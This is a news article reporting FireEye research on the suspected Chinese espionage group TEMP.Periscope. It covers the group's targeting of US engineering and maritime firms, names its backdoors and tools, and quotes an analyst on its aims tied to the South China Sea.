Maritine industries target of suspected Chinese cyber-espionage group

News by Robert Abel

The suspected Chinese cyber-espionage group dubbed "TEMP.Periscope" is targeting US engineering and maritime industries in its latest campaign.

The suspected Chinese cyber-espionage group dubbed “TEMP.Periscope” is targeting US engineering and maritime industries in its latest campaign.

The group has also been reported as “Leviathan” by other security firms, and has also targeted engineering-focused entities, and include research institutes, academic organisations, and private firms in the United States, according to a 16 March FireEye blog post.

“The current campaign is a sharp escalation of detected activity since summer 2017,” researchers said in a 16 March blog post. “Like multiple other Chinese cyber-espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit.”

The group uses several tools including a JavaScript-based backdoor named “AIRBREAK” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services, and a backdoor named “BADFLICK” that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.

The group also leverages a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors dubbed “HOMEFRY”. Other tools include a DLL backdoor, an uploader that can exfiltrate files to Dropbox, and a simple code injection webshell.

Most of the group's victims were found in the United States, although organisations in Europe and at least one in Hong Kong have also been affected.

The attacks suggest the threat actors were looking for information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

Researchers said the threat groups targeting, tactics, and procedures overlap with those of TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

The group also employs tactics such as spearphishing attacks, lure documents, stolen code signing certificates, and the use of PowerShell to download additional tools.

Fred Plan, senior analyst at FireEye, told SC Media the organisations targeted by TEMP.the group have a connection to the ongoing disputes in the South China Sea.

“They or their customers are involved in military and defence, or the shipping business, or they are developing technologies that would be advantageous to the defence industry or governments in the region,” Plan said. “Because of the group's tendency to target engineering organisations we believe the group is seeking technical data that can help inform strategic decision-making.”

He added that hypothetically, this could be used to understand what the range and effectiveness of this marine radar system or ‘how precisely a system can detect and identify activities at sea.


Find this article useful?

Get more great articles like this in your inbox every lunchtime

Video and interviews